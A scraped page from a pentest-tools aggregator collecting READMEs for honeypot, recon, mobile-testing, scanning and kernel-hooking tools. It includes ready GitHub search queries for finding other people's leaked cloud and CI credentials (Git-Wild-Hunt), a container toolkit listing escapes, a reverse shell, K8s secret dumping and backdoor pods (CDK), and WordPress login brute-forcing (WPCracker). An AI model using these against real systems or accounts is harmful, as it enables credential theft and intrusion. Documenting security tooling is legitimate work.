Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

HosTaGe - Low Interaction Mobile Honeypot

$
0
0


HosTaGe is a lightweight, low-interaction, portable, and generic honeypot for mobile devices that aims on the detection of malicious, wireless network environments. As most malware propagate over the network via specific protocols, a low-interaction honeypot located at a mobile device can check wireless networks for actively propagating malware. We envision such honeypots running on all kinds of mobile devices, e.g., smartphones and tablets, to provide a quick assessment on the potential security state of a network.

HosTaGe emulates the following protocols as of the latest version: AMQP, COAP, ECHO, FTP, HTTP, HTTPS, MySQL, MQTT, MODBUS, S7COMM, SNMP, SIP, SMB, SSH, SMTP and TELNET


Download from Play Store!

The stable release of HosTaGe can be installed from Google Play Store. Play Store Link or, Scan the QR code below from your Android device.



References

The research behind HosTaGe has been published and presented in a number of scientific and industrial conferences. Below you can find some selected papers:

[1] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Mihai Plasoianu, Wulf Pfeiffer, Lars Pandikow, Max Mühlhäuser: This Network is Infected: HosTaGe – a Low-Interaction Honeypot for Mobile Devices. SPSM@CCS 2013:43-48

[2] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Max Mühlhäuser: HosTaGe: a Mobile Honeypot for Collaborative Defense. ACM SIN 2014:330-333

[3] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Max Mühlhäuser: Did you really hack a nuclear power plant? An industrial control mobile honeypot. IEEE CNS 2015:729-730

[4] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Carlos Garcia Cordero, Max Mühlhäuser: Multi-stage Attack Detection and Signature Generation with ICS Honeypots. IEEE/IFIP DISSECT@NOMS 2016:1227-1232

Download APK

HosTaGe-v2.2.11.apkRelease-Notes(latest)

HosTaGe-v2.1.1.apk Release-Notes

HosTaGe-v2.0.0.apk Release-Notes

Wiki

The Wiki provides information on getting started and using the app. Wiki for HosTaGe can be found here: Wiki.

GUI



Original Authors

Emmanouil Vasilomanolakis - idea, guidance and suggestions during development

Contributors

Shreyas Srinivasa, lead developer, Aalborg University and Technische Universität Darmstadt (Github - @sastry17)

Eirini Lygerou, GSoC 2020 Developer (Github - @irinil)

Mihai Plasoianu, student developer, Technische Universität Darmstadt

Wulf Pfeiffer, student developer, Technische Universität Darmstadt

Lars Pandikow, student developer, Technische Universität Darmstadt

Researchers

Shankar Karuppayah, mentoring, developer, Technische Universität Darmstadt

Mathias Fischer, mentoring, Universität Hamburg

Max Mühlhäuser, mentoring, Technische Universität Darmstadt

Carlos Garcia Cordero, mentoring, Technische Universität Darmstadt

Features of HoneyRJ were inspiration for this project. http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html\

Encryption for the SSH protocol were taken from Ganymed SSH-2 and slightly modified. http://code.google.com/p/ganymed-ssh-2/

GSoC 2020

The project was actively developed with participation in Google Summer of Code 2020. More information about GSoC2020 is here

HPFeeds

To access the hpfeeds from hostage please send an access request to hostage@es.aau.dk with your name and organization. Please note that access to the hpfeeds repository is provided only after an internal review.

Contact

Please use the Github issues to report any issues or for questions. Slack channel; Email




Git-Wild-Hunt - A Tool To Hunt For Credentials In Github Wild AKA Git*Hunt

$
0
0


A tool to hunt for credentials in the GitHub wild AKA git*hunt


Getting started
  1. Install the tool
  2. Configure your GitHub token
  3. Search for credentials
  4. See results cat results.json | jq

Installation
  • requirements: virtualenv, python3
  1. git clone https://github.com/d1vious/git-wild-hunt && cd git-wild-hunt clone project and cd into the project dir
  2. pip install virtualenv && virtualenv -p python3 venv && source venv/bin/activate && pip install -r requirements.txt create virtualenv and install requirements

Continue to configuring a GitHub API key


Configuration git-wild-hunt.conf

Make sure you set a GitHub token if you need to create one for your account follow these instructions.

[global]
github_token = ''
# GitHub token for searching

output = results.json
# stores matches in JSON here

log_path = git-wild-hunt.log
# Sets the log_path for the logging file

log_level = INFO
# Sets the log level for the logging
# Possible values: INFO, ERROR

regexes = regexes.json
# regexes to check the git wild hunt search against

GitHub search examples

the -s flag accepts any GitHub advance search query, see some examples below


Find GCP JWT token files

python git-wild-hunt.py -s "extension:json filename:creds language:JSON"


Find AWS API secrets

python git-wild-hunt.py -s "path:.aws/ filename:credentials"


Find Azure JWT Token

python git-wild-hunt.py -s "extension:json path:.azure filename:accessTokens language:JSON"


Find GSUtils configs

python git-wild-hunt.py -s "path:.gsutil filename:credstore2"


Find Kubernetes config files

python git-wild-hunt.py -s "path:.kube filename:config"


Searching for Jenkins credentials.xml file

python git-wild-hunt.py -s "extension:xml filename:credentials.xml language:XML"


Find secrets in .circleci

python git-wild-hunt.py -s "extension:yml path:.circleci filename:config language:YAML"


Generic credentials.yml search

python git-wild-hunt.py -s "extension:yml filename:credentials.yml language:YAML"


Usage
usage: git-wild-hunt.py [-h] -s SEARCH [-c CONFIG] [-v]

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
search to execute
-c CONFIG, --config CONFIG
config file path
-v, --version shows current git-wild-hunt version

What checks get run regexes.json

This file contains all the regexes that will be used to check against the raw content filed returned for a search. Feel free to add/modify and include any specific ones that match the credential you are trying to find. This was graciously borrowed from truffleHog

Currently verified credentials via regex:

  • AWS API Key
  • Amazon AWS Access Key ID
  • Amazon MWS Auth Token
  • Facebook Access Token
  • Facebook OAuth
  • Generic API Key
  • Generic Secret
  • GitHub
  • Google (GCP) Service-account
  • Google API Key
  • Google Cloud Platform API Key
  • Google Cloud Platform OAuth
  • Google Drive API Key
  • Google Drive OAuth
  • Google Gmail API Key
  • Google Gmail OAuth
  • Google OAuth Access Token
  • Google YouTube API Key
  • Google YouTube OAuth
  • Heroku API Key
  • MailChimp API Key
  • Mailgun API Key
  • PGP private key block
  • Password in URL
  • PayPal Braintree Access Token
  • Picatic API Key
  • RSA private key
  • SSH (DSA) private key
  • SSH (EC) private key
  • Slack Token
  • Slack Webhook
  • Square Access Token
  • Square OAuth Secret
  • Stripe API Key
  • Stripe Restricted API Key
  • Twilio API Key
  • Twitter Access Token
  • Twitter OAuth

Author

Contributor

Credits & References

Inspiration to write this tool came from the shhgit project


TO DO
  • better error handling


MobileHackersWeapons - Mobile Hacker's Weapons / A Collection Of Cool Tools Used By Mobile Hackers

$
0
0


A collection of cool tools used by Mobile hackers. Happy hacking , Happy bug-hunting 

Weapons
OSTypeNameDescription
AllAnalysisRMS-Runtime-Mobile-SecurityRuntime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime
AllAnalysisscroungerMobile application testing toolkit
AllProxyBurpSuiteThe BurpSuite
AllProxyhettyHetty is an HTTP toolkit for security research.
AllProxyhttptoolkitHTTP Toolkit is a beautiful & open-source tool for debugging, testing and building with HTTP(S) on Windows, Linux & Mac
AllProxyproxifySwiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.
AllProxyzaproxyThe OWASP ZAP core project
AllREfridaClone this repo to build Frida
AllREfrida-toolsFrida CLI tools
AllREfridumpA universal memory dumper using Frida
AllREghidraGhidra is a software reverse engineering (SRE) framework
AllSCRIPTSfrida-scriptsA collection of my Frida.re instrumentation scripts to facilitate reverse engineering of mobile apps.
AllScannerMobile-Security-Framework-MobSFMobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
AndroidAnalysisapkleaksScanning APK file for URIs, endpoints & secrets.
AndroidAnalysisdrozerThe Leading Security Assessment Framework for Android.
AndroidNFCnfcgateAn NFC research toolkit application for Android
AndroidPentestKali NetHunterMobile Penetration Testing Platform
AndroidREApktoolA tool for reverse engineering Android apk files
AndroidREapkxOne-Step APK Decompilation With Multiple Backends
AndroidREbytecode-viewerA Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
AndroidREdex-oracleA pattern based Dalvik deobfuscator which uses limited execution to improve semantic analysis
AndroidREdex2jarTools to work with android .dex and java .class files
AndroidREenjarifyEnjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.
AndroidREjadxDex to Java decompiler
AndroidREjd-guiA standalone Java Decompiler GUI
AndroidREprocyonProcyon is a suite of Java metaprogramming tools, including a rich reflection API, a LINQ-inspired expression tree API for runtime code generation, and a Java decompiler.
AndroidScannerqarkTool to look for several security related Android application vulnerabilities
iOSAnalysisiFunBoxGeneral file management software for iPhone and other Apple products
iOSAnalysisidbidb is a tool to simplify some common tasks for iOS pentesting and research
iOSAnalysisneedleThe iOS Security Testing Framework
iOSAnalysisobjection
objection - runtime mobile exploration
iOSBluetoothtoothpickerToothPicker is an in-process, coverage-guided fuzzer for iOS. for iOS Bluetooth
iOSInjectbfinjectDylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks
iOSREClutchFast iOS executable dumper
iOSREclass-dumpGenerate Objective-C headers from Mach-O files.
iOSREfrida-ios-dumppull decrypted ipa from jailbreak device
iOSREiRETiOS Reverse Engineering Toolkit.
iOSREmomdecCore Data Managed Object Model Decompiler
iOSUnpinningMEDUZAA more or less universal SSL unpinning tool for iOS
iOSUnpinningssl-kill-switch2Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps


  

Reconftw - Simple Script For Full Recon

$
0
0


This is a simple script intended to perform a full recon on an objective with multiple subdomains


tl;dr
  • Requires Go
  • Run ./install.sh before first run (apt, rpm, pacman compatible)
git clone https://github.com/six2dez/reconftw
cd reconftw
chmod +x *.sh
./install.sh
./reconftw.sh -d target.com -a


Features
  • Tools checker
  • Google Dorks (based on deggogle_hunter)
  • Subdomain enumeration (passive, resolution, bruteforce and permutations)
  • Sub TKO (subjack and nuclei)
  • Web Prober (httpx)
  • Web screenshot (aquatone)
  • Template scanner (nuclei)
  • Port Scanner (naabu)
  • Url extraction (waybackurls, gau, hakrawler, github-endpoints)
  • Pattern Search (gf and gf-patterns)
  • Param discovery (paramspider and arjun)
  • XSS (Gxss and dalfox)
  • Github Check (git-hound)
  • Favicon Real IP (fav-up)
  • JS Checks (LinkFinder, SecretFinder, scripts from JSFScan)
  • Fuzzing (ffuf)
  • Cors (Corsy)
  • SSL Check (testssl)
  • Interlace integration
  • Custom output folder (default under Recon/target.com/)
  • Run standalone steps (subdomains, subtko, web, gdorks...)
  • Polished installer compatible with most distros

Mindmap/Workflow



Requirements
  • Golang> 1.14 installed and env vars correctly set ($GOPATH,$GOROOT)
  • Run ./install.sh

Installer is provided as is. Nobody knows your system better than you, so nobody can debug your system better than you. If you are experiencing some issues with the installer script I can help you out, but keep in mind that is not my main priority.

  • It is highly recommended, and in some cases essential, set your api keys:
    • amass (~/.config/amass/config.ini)
    • subfinder (~/.config/subfinder/config.yaml)
    • git-hound (~/.githound/config.yml)
    • github-endpoints.py (GITHUB_TOKEN env var)
    • favup (shodan init SHODANPAIDAPIKEY)
  • This script uses dalfox with blind-xss option, you must change to your own server, check xsshunter.com.

Usage examples

Full scan:
./reconftw.sh -d target.com -a

Subdomains scan:
./reconftw.sh -d target.com -s

Web scan (target list required):
./reconftw.sh -d target.com -l targets.txt -w

Dorks:
./reconftw.sh -d target.com -g

Improvement plan:
  • Notification support (Slack, Discord and Telegram)
  • CMS tools (wpscan, drupwn/droopescan, joomscan)
  • Add menu option for every feature
  • Any other interesting suggestion
  • Open Redirect with Oralyzer
  • Enhance this Readme
  • Customize output folder
  • Interlace usage
  • Crawler
  • SubDomainizer
  • Install script
  • Apt,rpm,pacman compatible installer

Thanks

For their great feedback, support, help or for nothing special but well deserved:



CDK - Zero Dependency Container Penetration Toolkit

$
0
0


CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs helps you to escape container and takeover K8s cluster easily.

Currently still under development, submit issues or mail i@cdxy.me if you need any help.


Installation

Download latest release in: https://github.com/cdk-team/CDK/releases/

Drop executable files into target container and start testing.


Usage
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk auto-escape <cmd>
cdk <tool> [<args>...]

Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.

Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.

Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
-h --help Show this help msg.
-v --version Show version.

Features

CDK have three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

TacticsScriptSupportedUsage/Example
Information GatheringOS Basic Info
link
Information GatheringAvailable Capabilities
link
Information GatheringAvailable Linux Commands
link
Information GatheringMounts
link
Information GatheringNet Namespace
link
Information GatheringSensitive ENV
link
Information GatheringSensitive Process
link
Information GatheringSensitive Local Files
link
DiscoveryK8s Api-server Info
link
DiscoveryK8s Service-account Info
link
DiscoveryCloud Provider Metadata API
link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
TacticTechniqueCDK Exploit NameSupportedDoc
Escapingdocker-runc CVE-2019-5736runc-pwn
Escapingdocker-cp CVE-2019-14271
Escapingcontainerd-shim CVE-2020-15257shim-pwn
link
Escapingdirtycow CVE-2016-5159
Escapingdocker.sock PoC (DIND attack)docker-sock-check
link
Escapingdocker.sock Backdoor Image Deploydocker-sock-deploy
link
EscapingDevice Mount Escapingmount-disk
link
EscapingCgroups Escapingmount-cgroup
link
EscapingProcfs Escapingmount-procfs
link
EscapingPtrace Escaping PoCcheck-ptrace
link
DiscoveryK8s Component Probeservice-probe
link
DiscoveryDump Istio Sidecar Metaistio-check
link
Lateral MovementK8s Service Account Control
Lateral MovementAttack K8s api-server
Lateral MovementAttack K8s Kubelet
Lateral MovementAttack K8s Dashboard
Lateral MovementAttack K8s Helm
Lateral MovementAttack K8s Etcd
Lateral MovementAttack Private Docker Registry
Remote ControlReverse Shellreverse-shell
link
Credential AccessAccess Key Scanningak-leakage
link
Credential AccessDump K8s Secretsk8s-secret-dump
link
Credential AccessDump K8s Configk8s-configmap-dump
link
PersistenceDeploy WebShell
PersistenceDeploy Backdoor Podk8s-backdoor-daemonset
link
PersistenceDeploy Shadow K8s api-serverk8s-shadow-apiserver
link
PersistenceK8s MITM Attack (CVE-2020-8554)k8s-mitm-clusterip
link
PersistenceDeploy K8s CronJob
Defense EvasionDisable K8s Audit

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
CommandDescriptionSupportedUsage/Example
ncTCP Tunnel
link
psProcess Information
link
ifconfigNetwork Information
link
viEdit Files
link
kcurlRequest to K8s api-server
link
dcurlRequest to Docker HTTP API
ucurlRequest to Docker Unix Socket
link
rcurlRequest to Docker Registry API
probeIP/Port Scanning
link

Developer Docs

TODO
  1. Echo loader for delivering CDK into target container via Web RCE.
  2. EDR defense evasion.
  3. Compile optimization.
  4. Dev docs


WPCracker - WordPress User Enumeration And Login Brute Force Tool

$
0
0


WordPress user enumeration and login Brute Force tool for Windows and Linux

With the Brute Force tool, you can control how aggressive an attack you want to perform, and this affects the attack time required. The tool makes it possible to adjust the number of threads as well as how large password batches each thread is tested at a time. However, too much attack power can cause the victim's server to slow down.

For example, When I attacked to my local server, it takes about two days to go through the rockyou.txt (14,341,564 unique passwords) when I used the program's presets for the number of threads (12) and the size of the batches (1000).

In this article, "victim" refers to the attacked WordPress site in pentest lab. Attacking a WordPress site for which you do not have permission may be illegal.


Using:

User Enumeration
.\WPCracker.exe --enum -u <Url to victims WordPress page> -o <Output file path (OPTIONAL)>

OR JUST
.\WPCracker.exe --enum

In this case, the program only requests the required information


Brute Force

Using program's presets
.\WPCracker.exe --brute -u <Url to victims WordPress page> -p <Path to wordlist> -n <Username> -o <Output file path (OPTIONAL)>

OR JUST
.\WPCracker.exe --brute

In this case, the program only requests the required information


Using with custom settings
.\WPCracker.exe --brute -u <Url to victims WordPress page> -p <Path to wordlist> -n <Username> -t <Max threads> -c <Batch maximum size>

Get help
.\WPCracker.exe --brute -?

This is for ethical use only :)

Thank's for adamabdelhamed's PowerArgs


MetaFinder - Search For Documents In A Domain Through Google

$
0
0


Search For Documents In A Domain Through Google. The Objective Is To Extract Metadata.

Installing dependencies:
> git clone https://github.com/Josue87/MetaFinder.git
> cd MetaFinder
> pip3 install -r requirements.txt

Usage
python3 metafinder.py -t domain.com -l 20 [-v]

Parameters:

  • t: Specifies the target domain.
  • l: Specify the maximum number of results to be searched.
  • v: Optional. It is used to display the results on the screen as well.

Author

This project has been developed by:


Disclaimer!

This Software has been developed for teaching purposes and for use with permission of a potential target. The author is not responsible for any illegitimate use.



Sigurlx - A Web Application Attack Surface Mapping Tool

$
0
0


sigurlx a web application attack surface mapping tool, it does ...:

  • Categorize URLs URLs' categories:
    > endpoint
    > js {js}
    > style {css}
    > data {json|xml|csv}
    > archive {zip|tar|tar.gz}
    > doc {pdf|xlsx|doc|docx|txt}
    > media {jpg|jpeg|png|ico|svg|gif|webp|mp3|mp4|woff|woff2|ttf|eot|tif|tiff}
  • Next, probe HTTP requests to the URLs for status_code, content_type, e.t.c
  • Next, for every URL of category endpoint with a query:

Usage

To display help message for sigurlx use the -h flag:

$ sigurlx -h

_ _
___(_) __ _ _ _ _ __| |_ __
/ __| |/ _` | | | | '__| \ \/ /
\__ \ | (_| | |_| | | | |> <
|___/_|\__, |\__,_|_| |_/_/\_\ v2.1.0
|___/

USAGE:
sigurlx [OPTIONS]

GENERAL OPTIONS:
-iL input urls list (use `-iL -` to read from stdin)
-threads number concurrent threads (default: 20)
-update-params update params file

HTTP OPTIONS:
-delay delay between requests (default: 100ms)
-follow-redirects follow redirects (default: false)
-follow-host-redirects follow internal redirects i.e, same host redirects (default: false)
-http-proxy HTTP Proxy URL
-timeout HTTP request timeout (default: 10s)
-UA HTTP user agent

OUTPUT OPTIONS:
-nC no color mode
-oJ JSON output file (default: ./sigurlx.json)
-v verbose mode

Installation

From Binary

You can download the pre-built binary for your platform from this repository's releases page, extract, then move it to your $PATHand you're ready to go.


From Source

sigurlx requires go1.14+ to install successfully. Run the following command to get the repo

▶ go get -u github.com/drsigned/sigurlx/cmd/sigurlx

From Github
▶ git clone https://github.com/drsigned/sigurlx.git
▶ cd sigurlx/cmd/sigurlx/
▶ go build .
▶ mv sigurlx /usr/local/bin/
▶ sigurlx -h

Contribution

Issues and Pull Requests are welcome!




Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys

$
0
0


ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection, ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING, ZMap can scan the IPv4 address space in under 5 minutes.

ZMap operates on GNU/Linux, Mac OS, and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans, ICMP, DNS queries, UPnP, BACNET, and can send a large number of UDP probes. If you are looking to do more involved scans, e.g., banner grab or TLS handshake, take a look at ZGrab, ZMap's sister project that performs stateful application-layer handshakes.


Installation

The latest stable release of ZMap is version 2.1.1 and supports Linux, macOS, and BSD. We recommend installing ZMap from HEAD rather than using a distro package manager.

Instructions on building ZMap from source can be found in INSTALL.


Usage

A guide to using ZMap is found in our GitHub Wiki.



Xnuspy - An iOS Kernel Function Hooking Framework For Checkra1N'Able Devices

$
0
0

Output from the kernel log after compiling and running example/open1_hook.c

xnuspy is a pongoOS module which installs a new system call, xnuspy_ctl, allowing you to hook kernel functions from userspace. It supports iOS 13.x and 14.x on checkra1n 0.12.2 and up. 4K devices are not supported.

Requires libusb: brew install libusb


Building

Run make in the top level directory. It'll build the loader and the module. If you want debug output from xnuspy to the kernel log, run XNUSPY_DEBUG=1 make.


Usage

After you've built everything, have checkra1n boot your device to a pongo shell: /Applications/checkra1n.app/Contents/MacOS/checkra1n -p

In the same directory you built the loader and the module, do loader/loader module/xnuspy. After doing that, xnuspy will do its thing and in a few seconds your device will boot. loader will wait a couple more seconds after issuing xnuspy-getkernelv in case SEPROM needs to be exploited.


Known Issues

Sometimes a couple of my phones would get stuck at "Booting" after checkra1n's KPF runs. I have yet to figure out what causes this, but if it happens, try again. Also, if the device hangs after bootx, try again. Finally, marking the compiled xnuspy_ctl code as executable on my iPhone X running iOS 13.3.1 is a bit spotty, but succeeds 100% of the time on my other phones. If you panic with a kernel instruction fetch abort when you execute your hook program, try again.


xnuspy_ctl

xnuspy will patch an enosys system call to point to xnuspy_ctl_tramp. This is a small trampoline which marks the compiled xnuspy_ctl code as executable and branches to it. You can find xnuspy_ctl's implementation at module/el1/xnuspy_ctl/xnuspy_ctl.c and examples in the example directory. That directory also contains xnuspy_ctl.h, a header which defines constants for xnuspy_ctl. It is meant to be included in all programs which call it.

You can use sysctlbyname to figure out which system call was patched:

size_t oldlen = sizeof(long);
long SYS_xnuspy_ctl = 0;
sysctlbyname("kern.xnuspy_ctl_callnum", &SYS_xnuspy_ctl, &oldlen, NULL, 0);

This system call takes four arguments, flavor, arg1, arg2, and arg3. The flavor can either be XNUSPY_CHECK_IF_PATCHED, XNUSPY_INSTALL_HOOK, XNUSPY_REGISTER_DEATH_CALLBACK, XNUSPY_CALL_HOOKME, or XNUSPY_CACHE_READ. The meaning of the next three arguments depend on the flavor.


XNUSPY_CHECK_IF_PATCHED

This exists so you can check if xnuspy_ctl is present. Invoking it with this flavor will cause it to return 999. The values of the other arguments are ignored.


XNUSPY_INSTALL_HOOK

I designed this flavor to match MSHookFunction's API. arg1 is the UNSLID address of the kernel function you wish to hook. If you supply a slid address, you will most likely panic. arg2 is a pointer to your ABI-compatible replacement function. arg3 is a pointer for xnuspy_ctl to copyout the address of a trampoline that represents the original kernel function. This can be NULL if you don't intend to call the original.


XNUSPY_REGISTER_DEATH_CALLBACK

This flavor allows you to register an optional "death callback", a function xnuspy will call when your hook program exits. It gives you a chance to clean up anything you created from your kernel hooks. If you created any kernel threads, you would tell them to terminate in this function.

Your callback is not invoked asynchronously, so if you block, you're preventing xnuspy's garbage collection thread from executing.

arg1 is a pointer to your callback function. The values of the other arguments are ignored.


XNUSPY_CALL_HOOKME

hookme is a small assembly stub which xnuspy exports through the xnuspy cache for you to hook. Invoking xnuspy_ctl with this flavor will cause hookme to get called, providing a way for you to easily gain kernel code execution without having to hook an actual kernel function.

There are no arguments for this flavor.


XNUSPY_CACHE_READ

This flavor gives you a way to read from the xnuspy cache. It contains many useful things like kprintf, current_proc, kernel_thread_start, and the kernel slide so you don't have to find them yourself. For a complete list of cache IDs, check out example/xnuspy_ctl.h.

arg1 is one of the cache IDs defined in xnuspy_ctl.h and arg2 is a pointer for xnuspy_ctl to copyout the address or value of what you requested.


Errors

For all flavors except XNUSPY_CHECK_IF_PATCHED, 0 is returned on success. Upon error, -1 is returned and errno is set. XNUSPY_CHECK_IF_PATCHED does not return any errors.


Errors Pertaining to XNUSPY_INSTALL_HOOK

errno is set to...

  • EEXIST if:
    • A hook already exists for the unslid kernel function denoted by arg1.
  • ENOMEM if:
    • kalloc_canblock or kalloc_external returned NULL.
  • ENOSPC if:
    • There are no free xnuspy_tramp structs or reflector pages. These data structures are internal to xnuspy. This should never happen unless you are hooking hundreds of kernel functions at the same time.
  • EFAULT if:
    • current_map()->hdr.vme_start is not a pointer to the calling processes' Mach-O header.
  • ENOENT if:
    • map_caller_segments was unable to find __TEXT and __DATA for the calling process.
  • EIO if:
    • mach_make_memory_entry_64 did not return a memory entry for the entirety of the calling processes' __TEXT and __DATA segments.

errno also depends on the return value of vm_map_wire_external, mach_vm_map_external, copyin, copyout, and if applicable, the one-time initialization function. An errno of 10000 represents a kern_return_t value that I haven't yet taken into account for (and a message is printed to the kernel log about it if you compiled with XNUSPY_DEBUG=1).

If this flavor returns an error, the target kernel function was not hooked. If you passed a non-NULL pointer for arg3, it may or may not have been initialized. It's unsafe to use if it was.


Errors Pertaining to XNUSPY_REGISTER_DEATH_CALLBACK

errno is set to...

  • ENOENT if:
    • The calling process hasn't hooked any kernel functions.

If this flavor returns an error, your death callback was not registered.


Errors Pertaining to XNUSPY_CALL_HOOKME

errno is set to...

  • ENOTSUP if:
    • hookme is too far away from the page of xnuspy_tramp structures. This is determined inside of pongoOS, and can only happen if xnuspy had to fallback to unused code already inside of the kernelcache. In this case, calling hookme would almost certainly cause a kernel panic, and you'll have to figure out another kernel function to hook.

If this flavor returns an error, hookme was not called.


Errors Pertaining to XNUSPY_CACHE_READ

errno is set to...

  • EINVAL if:
    • The constant denoted by arg1 does not represent anything in the cache.
    • arg1 was KALLOC_EXTERNAL, but the kernel is iOS 13.x.
    • arg1 was KALLOC_CANBLOCK, but the kernel is iOS 14.x.
    • arg1 was KFREE_EXT, but the kernel is iOS 13.x.
    • arg1 was KFREE_ADDR, but the kernel is iOS 14.x.

errno also depends on the return value of copyout and if applicable, the return value of the one-time initialization function.

If this flavor returns an error, the pointer you passed for arg2 was not initialized.


Important Information

Common Pitfalls

While writing replacement functions, it was easy to forget that I was writing kernel code. Here's a couple things to keep in mind when you're writing hooks:

  • You cannot execute any userspace code that lives outside your program's __TEXT segment. You will panic if, for example, you accidentally call printf instead of kprintf. You need to re-implement any libc function you wish to call. You can create function pointers to other kernel functions and call those, though.
  • Many macros commonly used in userspace code are unsafe for the kernel. For example, PAGE_SIZE expands to vm_page_size, not a constant. You need to disable PAN (on A10+, which I also don't recommend doing) before reading this variable or you will panic.
  • Just to be safe, don't compile your hook programs with compiler optimizations.

Skimming https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/style/style.html is also recommended.


Logging

For some reason, logs from os_log_with_args don't show up in the stream outputted from the command line tool oslog. Logs from kprintf don't make it there either, but they can be seen with dmesg. However, dmesg isn't a live feed, so I wrote klog, a tool which shows kprintf logs in real time. Find it in klog/. I strongly recommend using that instead of spamming dmesg for your kprintf messages.


Debugging Kernel Panics

Bugs are inevitable when writing code, so eventually you're going to cause a kernel panic. A panic doesn't necessarily mean there's a bug with xnuspy, so before opening an issue, please make sure that you still panic when you do nothing but call the original function and return its value (if needed). If you still panic, then it's likely an xnuspy bug (and please open an issue), but if not, there's something wrong with your replacement.

Since xnuspy does not actually redirect execution to EL0 pages, debugging a panic isn't as straightforward. Open up module/el1/xnuspy_ctl/xnuspy_ctl.c, and right before the only call to kwrite_instr in xnuspy_install_hook, add a call to IOSleep for a couple seconds. This is done to make sure there's enough time before the device panics for logs to propagate. Re-compile xnuspy with XNUSPY_DEBUG=1 make -B and load the module again. After loading the module, if you haven't already, compile klog from klog/. Upload it to your device and do stdbuf -o0 ./klog | grep shared_mapping_kva. Run your hook program again and watch for a line from klog that looks like this:

shared_mapping_kva: dist 0x780c replacement 0x100cd780c umh 0x100cd0000 kmh 0xfffffff0311c0000

If you're installing more than one hook, there will be more than one occurrence. In that case, dist and replacement will vary, but umh and kmh won't. kmh points to the beginning of the kernel's mapping of your program's __TEXT segment. Throw your hook program into your favorite disassembler and rebase it so its Mach-O header is at the address of kmh. For IDA Pro, that's Edit -> Segments -> Rebase program... with Image base bubbled. After your device panics and reboots again, if there are addresses which correspond to the kernel's mapping of your replacement in the panic log, they will match up with the disassembly. If there are none, then you probably have some sort of subtle memory corruption inside your replacement.


Hook Uninstallation

xnuspy will manage this for you. Once a process exits, all the kernel hooks that were installed by that process are uninstalled within a second or so.


Hookable Kernel Functions

Most function hooking frameworks have some minimum length that makes a given function hookable. xnuspy has this limit only if you plan to call the original function and the first instruction of the hooked function is not B. In this case, the minimum length is eight bytes. Otherwise, there is no minimum length.

xnuspy uses X16 and X17 for its trampolines, so kernel functions which expect those to persist across function calls cannot be hooked (there aren't many which expect this). If the function you want to hook begins with BL, and you intend to call the original, you can only do so if executing the original function does not modify X17.


Thread-safety

xnuspy_ctl will perform one-time initialization the first time it is called after a fresh boot. This is the only part of xnuspy which is raceable since I can't statically initialize the read/write lock I use. After the first call returns, any future calls are guarenteed to be thread-safe.


How It Works

This is simplified, but it captures the main idea well. A function hook in xnuspy is a structure that resides on writeable, executable kernel memory. In most cases, this is memory returned by alloc_static inside of pongoOS. It can be boiled down to this:

struct {
uint64_t replacement;
uint32_t tramp[2];
uint32_t orig[10];
};

Where replacement is the kernel virtual address (elaborated on later) of the replacement function, tramp is a small trampoline that re-directs execution to replacement, and orig is a larger, more complicated trampoline that represents the original function.

Before a function is hooked, xnuspy creates a shared user-kernel mapping of the calling processes' __TEXT and __DATA segments (as well as any segment in between those, if any). __TEXT is shared so you can call other functions from your hooks. __DATA is shared so changes to global variables are seen by both EL1 and EL0. This is done only once per process.

Since this mapping is a one-to-one copy of __TEXT and __DATA, it's easy to figure out the address of the user's replacement function on it. Given the address of the calling processes' Mach-O header u, the address of the start of the shared mapping k, and the address of the user's replacement function r, we apply the following formula: replacement = k + (r - u)

After that, replacement is the kernel virtual address of the user's replacement function on the shared mapping and it is written to the function hook structure. xnuspy does not re-direct execution to the EL0 address of the replacement function because that's extremely unsafe: not only does that put us at the mercy of the scheduler, it gives us no control over the scenario where a process with a kernel hook dies while a kernel thread is still executing on the replacement.

